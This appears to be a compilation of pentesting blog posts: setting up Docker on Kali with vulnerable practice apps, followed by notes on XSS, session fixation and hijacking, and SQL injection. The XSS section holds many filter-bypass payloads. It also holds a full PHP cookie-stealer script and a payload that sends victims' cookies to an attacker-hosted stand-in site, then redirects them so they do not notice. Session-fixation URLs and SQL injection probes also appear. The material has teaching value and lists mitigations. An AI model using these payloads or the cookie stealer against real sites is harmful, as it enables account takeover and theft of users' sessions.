Installation of Docker in Kali Linux and Basics.

Today, we will Install docker in Kali linux (Fresh Installation, Search for docker image, Pull docker image and Run|Stop docker image

Follow the steps shown in video and below are the commands to be used

Installation of Docker in Kali linux 

Commands:   (Here scerets are revealed)

Check Docker is present or not 

# sudo docker --version

# sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -

# sudo echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

# sudo apt-get update

# sudo apt-get install docker-ce  (for fresh installation)

# sudo systemctl start docker

# sudo systemctl enable docker

# sudo docker --version 

Search docker image 

# sudo docker search xvwa

Pull docker images in docker 

# sudo docker "image name"

Check all docker Images installed

# sudo docker image ls

Run docker image 

# sudo docker run --name "anyname" -d -P "image name"

example: # sudo docker run --name xvwa -d  -P tuxotron/xvwa

To stop docker image or running process 

# sudo docker stop "name"

To check running container id

# sudo docker ps -aq

To stop docker container id

# sudo docker stop "container id"

To rm docker container id 

# sudo docker rm "container id"

To remove docker image

# sudo docker rm "image name"

Run Docker image outside the Kali Linux VM 

  check your ip with help of ifconfig and assign port 

# sudo ifconfig

# sudo docker run --name xvwa -d -p (yourip):80:80 tuxotron/xvwa

Happy Hacking !!!!

Pprasoon

#Docker #KaliLinux #DockerInstallation #Dockerpullimage #DockerSerachImage

Web Pentetsing LAB in KALI LINUX with DOCKER

Hi | Welcome | Web Pentetsing in KALI LINUX with DOCKER #Pprasoon

Today, we will create Web Application Penteting lab on Kali Linux with the help of Docker.

Following can be used in VMWare player / Workstation | Virtual box

Follow the the steps show in video and below are the commands to be used

Step 1:

    Installation of Docker in Kali linux 

Commands: (Here scerets are revealed)

> sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -

> sudo echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

> sudo apt-get update

> sudo apt-get install docker-ce  (for fresh installation) 

> sudo systemctl start docker

> sudo systemctl enable docker

> sudo docker --version 

Step 2:

        Installing OWASP Broken Web Applications like 

bWAPP

WebGoat 7.1

WebGoat 8.0

Damn Vulnerable Web App

Mutillidae II

OWASP Juice Shop

WPScan Vulnerable Wordpress

OpenDNS Security Ninjas

Altoro Mutual

Commands:  (Here scerets are revealed)

> su (to change user to root)

> git clone https://github.com/eystsen/pentestlab.git

> cd pentestlab

> ./pentestLab.sh --help

> ./pentestlab.sh list 

> ./pentestlab.sh start bwapp

First check image (Broken Web application running with help of docker) 

Commands: (Here scerets are revealed)

> sudo docker ps

> Copy the IP & port and paste in browser 

Running the above images in Kali with the help of docker (second method).

For Accessing the Broken Web applications outside the Kali Linux on host machine.

Commands:   (Here scerets are revealed)

> sudo docker images

> sudo docker run --name bwapp -d -p <yourip>:80:80 raesene/bwapp

> sudo docker ps

To stop any above process 

> sudo docker stop "name"

PLEASE STOP YOUR ANITVIRS BEFORE CHECKING ON HOST (if required)

Configuration of BurpSuite in Firefox to Intercept the Request and Response 

> We will install foxyproxy addon

Happy Hacking !!!!

Pprasoon

#docker #kalilinux #Webpentesting #lab #virtualbox

Cross Site Scripting (XSS)

Cross Site Scripting (XSS)
===============================
Definition => Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

The ability to inject code into the Web page generated, potential threats. An attacker can use XSS vulnerabilities to steal cookies, hijack accounts, execute ActiveX, execute Flash content, force you to download software, and take action on your hard disk and data.

If you look more closely at the URL, it might actually exploit a vulnerability in your bank’s Web site, and look something like http://www.website.com/somepage?redirect=<script>alert(‘XSS’)</script>, where the use of the “redirect” parameter has been exploited to carry out the attack.

**************************
ALL about SQL Injection and Defence
What is Session
Fun with computers => make-folder-without-name
********************************************************

XSS are 3 types
==================
Stored XSS (AKA Persistent or Type I)
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser

Reflected XSS (AKA Non-Persistent or Type II)
Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. In some cases, the user-provided data may never even leave the browser

DOM Based XSS (AKA Type-0)
DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write)."

URL fragments (use to go something inside javascript | Something coming after # (hash) will not go to the server.


Attacks can be done by XSS
==========================================
> steal cookies (if they are not httpOnly)
> retrieve the current page that the victim sees (as the victim user)
> get the current URL of the victim
> get the current referrer of the victim
> Redirect to some other website
> use the application cookies to gain access to the victim’s account
> use possible CSRF (cross-site request forgery) vulnerabilities to make the victim perform unwanted actions in the application (e.g. add a new user)
> inject malicious code into victim’s browser in order to exploit browser vulnerabilities
> inject malicious Java applet, etc

Mitigation
===============
> Input validation  both client and server side
> Output encoding
> White listing of words
> OWASP escapi

JavaScript functionality
==============================
Window object
Windows Object Properties
1) window.locate
<script>window.location.href="htts://www.google.co.in"</script>

2) document.body.innerHTML
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>


XSS Cases
===================
Case 1 :
When there is no input validation and no output encoding use simple payload
<script>alert(9)</script>
<svg/onload=alert(9)>
“><img src=x onerror=alert(1);>

Case 2 :
When value is going inside value Case (value= "something">) then try to put payload outside the double quotes
"><script>alert(9)</script>
"><svg/onload=alert(9)>

Case 3 :
Try inject payload all the possible parameters, input boxes, dropdown list and hidden fields like
input boxes
search?q=
value=' '
drop down list value going in a parameter
p=something (Hidden) (intercept with the burp-Suite)

Case 4 :
when input box has limitation of alphabets to be written in it. Then right click on input box choose inspect element and change the number to max (so that u can write your payload)
value = "><svg/onload=alert(9)>

Case 5 :
When you are getting output encoding inside the value tag then try to make payload using event handlers like onmouseover or onmouseclick
Even see what all things are output encoded and escaped
123" onmouseover="alert(9);
asd" onmouseclick="alert(9);
When server is escaping special characters like " or ' then payload be
123 onmouseover=alert(9);

Case 6 : 
A thumb rule for href tag is that when any input is making a hyperlink just give him a simple payload
javascript:alert(9)
and you get the alert box
hyper link payloads
<a href="http:google.com" onclick=javascript:alert(9)> for always a link created
www.google.com" onclick="confirm(9)"> href payload

Case 7 : 
When server is removing some words or alphabets the try to covert that words in base64 to bypass
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script>
"><script>eval(alert(document.domain))</script>

Case 8 :
the words script, style and on aren't allowed, we have to think about something else this time. Apparently, it's possible to encode JavaScript as Base64 and make it execute as an iframe src.

<iframe src="data:text/html;base64, .... base64 encoded HTML data ....">

The HTML data we want to use is:
<script>parent.alert(document.domain);</script>

parent. is needed because we want the alert to execute in the context of the parent's window. Encoding it as Base64 with the Character Encoding Calculator results in:

PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4

The code that we will then put into the search box to finish the level is:

"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="></iframe>


Case 9 : 
Sometimes playing with html tags also leads to XSS
for example :
closing of a textarea and then putting a payload leads to stored XSS
payload :
</textarea><svg/onload=alert(9)>

Case 10 :
Sometimes putting a parameter and then a payload leads to reflective XSS
for example
we have an url http://www.website.com/forgotpassword
change to
url http://www.website.com/forgotpassword?aa=<script>alert(9)</script>

Case 11 :
When some input is going inside <script> </script> the we have to only put "-alert(9)-"
it is vulnerable to XSS

Case 12 : DOM BASED XSS
For example:
1)
Assume that the URL
http://www.vulnerable.site/welcome.html

contains the following content:
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>

Welcome to our system
…</HTML>
This page will use the value from the "name" parameter in the following manner.
http://www.vulnerable.site/welcome.html?name=Joe
In this example, the JavaScript code embeds part of the document.URL (the page location) into the page, without any consideration for security. An attacker can abuse this by luring the client to click on a link such as
http://www.vulnerable.site/welcome.html?name=
<script>alert(document.cookie)</script>

2)
<script>

var h = document.location.hash.substring(1);
if (h && h != ""){
 var re = new RegExp(".+@.+");
 if (h.match(re)){
document.getElementById("email").innerHTML+="("+h+")";
}
}
</script>
payload = <img/src=x onerror=alert(9)>@gmail.com
==============
IMP :-
Attribute's value field (with the " character escaped to &#34). Escaping ASCII characters can easily be done through this character encoding calculator: http://ha.ckers.org/xsscalc.html.
============================================================================================================================


**************************
ALL about SQL Injection and Defence
What is Session
Fun with computers => make-folder-without-name
**************************************************

Exploitation With XSS
=========================
IMP => https://www.exploit-db.com/papers/13057/
   https://www.exploit-db.com/docs/15530.pdf
http://internet.wonderhowto.com/how-to/hack-remote-internet-browser-with-xss-shell-261948/

Exploit 1 :
Attacker can redirect victim to the malicious website
payload :
<script>alert("click ok to redirect");window.location.href="https://www.google.com"</script>

Attacker can make victim to download any malicious file to download
payload
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

Exploit 2 :
Attacker can steal cookies of the victim
How to do it :
In stealing cookies, there is a 3 step process
attacker needs
1)injected script
2)cookies stealer
3)log file

Create an account on a server and create two files, log.txt and cookiestealer.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste following php code into your cookie stealer script (cookiestealer.php):

cookiestealer code :

<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
fclose($log);
}

logData();

?>

This script will record the cookies of every user that views it.

Now find a XSS vulnerable page or parameter or search box and put the payload
"><script language= "JavaScript">document.location="http://yoursite.com/cookiestealer.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.

Exploit 3 : 
Attacker can deface a page with its own page or pic or photo
Palyload
<img src=link of the image>
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

Exploit 4 :
BEF = Browser Exploitation Framework

http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.kypFITWL.dpbs

Session_ALL about Session

Session ID is not updating after login
This attack is done locally: for example => in an organization someone log out and the session is not expired, he/she may try login into it by using that session again

Attack Scenario: Setting Session ID help of XSS

*************************
All about broken-authentication-and-session
SQL Injection and Defense
*************************************************

Session Fixation
======================
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the user session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.

The session fixation attack is a class of Session Hijacking, which steals the established session between the client and the Web Server after the user logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in.

There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:

• Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.

• Session token in a hidden form field: In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server or directly in HTML formatted e-mail.

• Session ID in a cookie:

o Client-side script

Most browsers support the execution of client-side scripting. In this case, the aggressor could use attacks of code injection as the XSS (Cross-site scripting) attack to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser which executes the command becomes capable of fixing values inside of the cookie that it will use to keep a session between the client and the Web Application.

o <META> tag

<META> tag also is considered a code injection attack, however, different from the XSS attack where undesirable scripts can be disabled, or the execution can be denied. The attack using this method becomes much more efficient because it's impossible to disable the processing of these tags in the browsers.

o HTTP header response

This method explores the server response to fix the Session ID in the victim's browser. Including the parameter Set-Cookie in the HTTP header response, the attacker is able to insert the value of Session ID in the cookie and sends it to the victim's browser.

*************************
Cross Site Scripting => Click on me :)
All about broken-authentication-and-session
SQL Injection and Defense
*************************************************


Session hijacking
======================
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.

Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the HTTP requisition as a cookie, in other parts of the header of the HTTP request, or yet in the body of the HTTP requisition.

The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.

The session token could be compromised in different ways; the most common are:

Predictable session token;
Session Sniffing;
Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
Man-in-the-middle attack
Man-in-the-browser attack

Broken Authentication and Session Management

Broken Authentication and Session Management
===============================================
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords,keys,or session tokens, or to exploit other implementation flaws to assume other user's identities.

Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, time-outs, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique

Session IDs
=================
A Session is a unique identifier....
As we know that HTTP is a stateless protocol, which means that it provides no integrated way for a web server to maintain states throughout user’s subsequent requests.
A session identifier, session ID or session token is a piece of data that is used in network communications (often over HTTP) to identify a session, a series of related message exchanges. Session identifiers become necessary in cases where the communications infrastructure uses a stateless protocol such as HTTP.
For example, a buyer who visits a seller's site wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several web pages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.

A session ID is typically granted to a visitor on his first visit to a site. It is different from a user ID in that sessions are typically short-lived (they expire after a preset time of inactivity which may be minutes or hours) and may become invalid after a certain goal has been met (for example, once the buyer has finalized his order, he cannot use the same session ID to add more items).

Three widely used methods for maintaining sessions in WEB
=======================================================
1) URL arguments
2) Hidden form fields
3) Cookies (cookies have proven to be the most convenient)

************************************
Cross Site Scripting => Click on me :)
Basics for SQL Injection and Remediations => Click on me :)
Nmap with Metasploits => Click one me :)
*************************************************************


Session Management
=====================
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.
Types
======
Desktop session management => A desktop session manager is a program that can save and restore desktop sessions. A desktop session is all the windows currently running and their current content.

Browser session management => Session management is particularly useful in a web browser where a user can save all open pages and settings and restore them at a later date. To help recover from a system or application crash, pages and settings can also be restored on next run.

Web Server Session management => Hypertext Transfer Protocol (HTTP) is stateless: a client computer running a web browser must establish a new Transmission Control Protocol (TCP) network connection to the web server with each new HTTP GET or POST request. The web server, therefore, cannot rely on an established TCP network connection for longer than a single HTTP GET or POST operation. Session management is the technique used by the web developer to make the stateless HTTP protocol support session state. For example, once a user has been authenticated to the web server, the user's next HTTP request (GET or POST) should not cause the web server to ask for the user's account and password again. For a discussion of the methods used to accomplish this see HTTP cookie and Session ID

Session management over SMS =>

Vulnerabilities
===========================
> User authentication credentials aren’t protected when stored using hashing or encryption.
> Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
> Session IDs are exposed in the URL (e.g., URL rewriting).
> Session IDs are vulnerable to session fixation attacks.
> Session IDs don’t time-out, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
> Session IDs aren’t rotated after successful login.
> Passwords, session IDs, and other credentials are sent over unencrypted connections.


Attacks Done on Session IDs
=====================================
1) Session Hijacking => The attacker gains access to the user’s session by obtaining his session ID, is called session hijacking
2) Session fixation =>  The attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need to obtain the user’s session ID afterwards.
Attacks made in session fixation =>
*) Interception (Encrypted communication effectively protects against interception)
*) Prediction (Cryptographically strong pseudo random number generators and carefully chosen seeds that don’t leak from the serve prevents prediction of session IDs)
*) Brute-force (Bit-length is large enough with respect to the number of simultaneous sessions)

Session fixation vs. session hijacking
==========================================
Timing
Session fixation : Attacker attacks the user’s browser before he logs in to the target server.
Session hijacking : Attacker attacks the user’s browser after he logs in to the target server.

Impact Duration
Session fixation : Attacker gains one-time, temporary or long-term access to the user’s session(s).
Session hijacking : Attacker usually gains one-time access to the user’s session and has to repeat the attack in order to gain access to another one.

Session Maintenance
Session fixation : Can require the attacker to maintain the trap session until the user logs into it.
Session hijacking : Requires no session maintenance.

Attack Vectors
Session fixation
1. Tricking the user to log in through a malicious hyperlink or a malicious login form
2. Exploiting a cross-site scripting vulnerability on any web server in the target server’s domain
3. Exploiting a meta tag injection vulnerability on any web server in the target server’s domain
4. Exploiting the “session adoption” feature of some web servers
5. Breaking into any host in the target server’s domain
6. Adding a domain cookie-issuing server to the target server’s domain in the user’s DNS server
7. Network traffic modification

Session hijacking
1. Exploiting a cross-site scripting vulnerability on the target server
2. Obtaining the session ID in the HTTP Referer header sent to another web server
3. Network traffic sniffing (only works with an unencrypted link to the target server)

Attack Target Area
Session fixation : Communication link, target web server, all hosts in target server’s domain, user’s DNS server
Session hijacking : Communication link, target web server


Mitigation
===============
1) HTTPonly
2) Secure flag if HTTPS is there
3) Encrypted communication between the user’s browser and the target web server
4) Ensuring that sessions expire and within a reasonable period of time

Broken Authentication and Session Management Cases
=====================================================
Case 1:
Plain text storage of password
Storing a password in plaintext may result in a system compromise
Attacker can sniff the network with the help of any sniffing tool (such as wire-shark)

Case 2:
Improper Authentication
The user claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

Case 3:
Missing Encryption of Sensitive Data
The software/website does not encrypt sensitive or critical information before storage or transmission
The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.
For example : Storage for credit card no. or pin, user info or password

Case 4:
Clear text Transmission of Sensitive Information
The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by an attacker.
Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by an attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.

Case 5:
Session Fixation
Read above for session fixation

Case 6:
Insufficiently Protected Credentials
Login pages not using adequate measures to protect the username and password while they are in transit from the client to the server
Use SSL

Case 7:
Insufficient Session Expiration
"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a website from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim.
> Set sessions/credentials expiration date

Case 8:
Unverified Password Change
When setting a new password for a user, the product does not require knowledge of the original password or using another form of authentication.
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user. (may lead to CSRF)

Case 9:
Weak Password Recovery Mechanism for Forgotten Password
The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account.(May lead to Brute force attack)
This weakness may be that the security question is too easy to guess or find an answer to (e.g. because it is too common). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. Weak password recovery schemes completely undermine a strong password


Exploitation With SessionId
================================
IMP : https://www.exploit-db.com/papers/15990/
=============

Exploit 1 : Session Fixation
A bank website, Session IDs are transported from browser to server within a URL argument sessionid.

The attacker – who in this case is also a legitimate user of the system – logs into the server and is issued a session ID 1234. The attacker then sends a hyperlink
http://online.worldbank.dom/login.jsp?sessionid=1234 to the victim, trying to lure him into clicking on it. The victim clicks on the link, which opens the server’s login page in his browser.
Note that upon request for login.jsp?sessionid=1234, the web application has established that a session already exists for this user and a new one need not be created. Finally, the user provides his credentials to the login script and the server grants him access to his bank account. However, at this point, knowing the session ID, the attacker can also access the victim's account via account.jsp?sessionid=1234. Since the session has already been fixed before the user logged in, we say that the user logged into the attacker’s session.

Attackers Uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234”;</script>.idc to fix the session id in to victim browser

For Domain Cookies fixation
Attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234;domain=.worldbank.dom”;</script>.idc

Meta tag injection
====================
Issuing a cookie using the <META> tag with Set-Cookie attribute
<meta http-equiv=Set-Cookie content="sessionid=1234">

http://online.worldbank.dom/<meta%20http-equiv=Set-Cookie%20content="sessionid=1234;%20Expires=Friday,%201-Jan-2010%2000:00:00%20GMT”>.idc

Exploit 2 : Network Base attack (man in the middle attack)
Sniffing the packets with in the network coming to and from the victim computer

The attacker can inject a small (invisible) image in any web server’s response to the browser – for example when the user is reading Yahoo news. This image would originate from any web server in the .website.com domain. Upon requesting the image content, the browser would connect to this web server and the attacker, intercepting the request, could send a fake response by the web server, including a Set-Cookie header, thereby fixing the user’s session.

Exploit 3 : Prediction
The attacker can predict the session if session ids are not unique or random numbers are no coming
For example :
The session id is 123456
session id2 is 123456789
session id3 is predictable may be 123456789101112

SQL injection Contd......

Sql injection is must be tested in headers cookies and parameters with a single quote (') Sql injection is more important then XSS and are always find in Select, create, update and delete where sql queries run... We search for error base entries which are dealing with database must be fuzzed with sql injection and with burp scanner CRUD must not be missed out detection is more important to find new areas of detection jason request, where there is key parameter must not be ignored as they are attached to the database for exploitation.

************************
Read the => SQL injection attack and defense notes
*****************************************

SQL map 
if not exploitable then reduce to likelihood but not the impact is always

Remediation 
suggest generic remediation and tenchologies based .net php j2ee

OWSASP guide is best to google search on this
 dynamic query 
Dynamic SQL is a programming technique that enables you to build SQL statements dynamically at runtime. You can create more general purpose, flexible applications by using dynamic SQL because the full text of a SQL statement may be unknown at compilation. For example, dynamic SQL lets you create a procedure that operates on a table whose name is not known until runtime.

Stored procedure functions persistent query 
 prepared statement 
 parameterized query (pre-compiled statement ) imp
 A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the "parameters" (think "variables") that need to be inserted into the statement for it to be executed. It's commonly used as a means of preventing SQL injection attacks php .net jsp is different.



************************
Read the => SQL injection attack and defense notes
*****************************************

SQL injection attack and defense notes

SQL injection vulnerabilities most commonly occur when the Web application developer does not ensure that values received from a Web form, cookie, input parameter, and so forth are validated or encoded before passing them to SQL queries that will be executed on a database server.

If an attacker can control the input that is sent to an SQL query and manipulate that input so that the data is interpreted as code instead of as data, he may be able to execute code on the back-end database.

Without a sound understanding of the underlying database that they are interacting with or a thorough understanding and awareness of the potential security issues
of the code that is being developed, application developers can often produce inherently insecure applications that are vulnerable to SQL injection

What is the impact of an SQL injection vulnerability?
A: This depends on many variables; however, potentially an attacker can manipulate data in the database, extract much more data than the application should allow, and possibly execute operating system commands on the database server

Is SQL injection a new vulnerability?
A: No. SQL injection has probably existed since SQL databases were first connected to Web applications. However, it was brought to the attention of the public on Christmas Day 1998.

Can Web sites be immune to SQL injection if they do not allow the quote character to be entered?
A: No. There is a myriad of ways to encode the quote character so that it is accepted as input, and some SQL injection vulnerabilities can be exploited without using it at all. Also, the quote character is not the only character that can be used to exploit SQL injection vulnerabilities; a number of characters are available to an attacker, such as the double pipe (||) and double quote (“), among others.

Q: My application is written in PHP/ASP/Perl/.NET/Java, etc. Is my chosen language immune?
A: No. Any programming language that does not validate input before passing it to a dynamically created SQL statement is potentially vulnerable; that is, unless it uses parameterized queries and bind variables.

**********************
Learn more on => SQL injection Contd......
Cross Site Scripting => Click on me :)
************************************************

Finding SQL Injection
=========================
The Web browser is a client acting as a front-end requesting data from the user and sending it to the remote server which will create SQL queries using the submitted data. Our main goal at this stage is to identify anomalies in the server response and determine whether they are generated by an SQL injection vulnerability.


Testing by Inference
There is one simple rule for identifying SQL injection vulnerabilities: Trigger anomalies by
sending unexpected data. This rule implies that:
■■ You identify all the data entry on the Web application.
■■ You know what kind of request might trigger anomalies.
■■ You detect anomalies in the response from the server.

The two most method are GET and POST
Now Get send everything in URL
for exampe :- GET /search.aspx?text=lcd%20monitors&cat=1&num=20 HTTP/1.1
ex-2
This kind of request sends parameters within the URLs in the following format:
?parameter1=value1&parameter2=value2&parameter3=value3...

POST = POST method is basically used when u fill the form, the value are sent at the bottom of the request

POST /contact/index.asp HTTP/1.1

Content-Length: 129
first=John&last=Doe&email=john@doe.com&phone=555123456&title=Mr&country=US&comments=
I%20would%20like%20to%20request%20information

Manipulating Parameter
For example, u have an URL
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=cars
http://www.victim.com/showproducts.php?category=boats

The showproducts.php page receives a parameter called category. we don't have type anything but click on link and u r redirected

but if u change http://www.victim.com/showproducts.php?category=attacker

you get SQL error
In the preceding example, we sent a request to the server with a non-existent category
name. The response from the server was as follows:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproducts.php on line 34

**********************
Learn more on => SQL injection Contd......
************************************************

Another interesting test you can conduct to identify vulnerabilities in Microsoft SQL Server and Oracle is to send the following two requests to the Web server:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=bi'+'kes
The MySQL equivalent is:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=bi' 'kes

If the result of both requests is the same, there is a high possibility that there is an SQL injection vulnerability.

SQL injection vulnerabilities occur for two reasons:
■■ Lack of user input sanitization
■■ Data and control structures mixed in the same transport channel

handled as a result of one of the following:
The SQL error ■■ is displayed on the page and is visible to the user from the
Web browser.
■■ The SQL error is hidden in the source of the Web page for debugging purposes.
■■ Redirection to another page is used when an error is detected.
■■ An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302
is returned.
■■ The application handles the error properly and simply shows no results, perhaps
displaying a generic error page.


Commonly Displayed SQL Errors
===============================

Microsoft SQL Server Errors

Consider the following request:
http://www.victim.com/showproducts.aspx?category=attacker'
The error returned from the remote application will be similar to the following:
Server Error in '/' Application.
Unclosed quotation mark before the character string 'attacker;'.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation

Imagine you find a page called showproduct.aspx in the victim.com application.
The script receives a parameter called id and displays a single product depending on the value
of the id parameter:
http://www.victim.com/showproduct.aspx?id=2
When you change the value of the id parameter to something such as the following:
http://www.victim.com/showproduct.aspx?id=attacker
the application returns an error similar to this:
Server Error in '/' Application.
Invalid column name 'attacker'.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid column name
'attacker'.
mark before the character string 'attacker;'.


Based on the error, you can assume that in the first instance the application creates an
SQL statement such as this:
SELECT * FROM products WHERE idproduct=2
The preceding statement returns a result set with the product whose id product field equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL statement sent to the database server has the following syntax:
Testing for SQL Injection
SELECT * FROM products WHERE idproduct=attacker
The SQL server understands that if the value is not a number it must be a column name.
In this case, the server looks for a column called attacker within the products table. However,
there is no column named attacker, and therefore it returns an error.
There are some techniques that you can use to retrieve information embedded in the
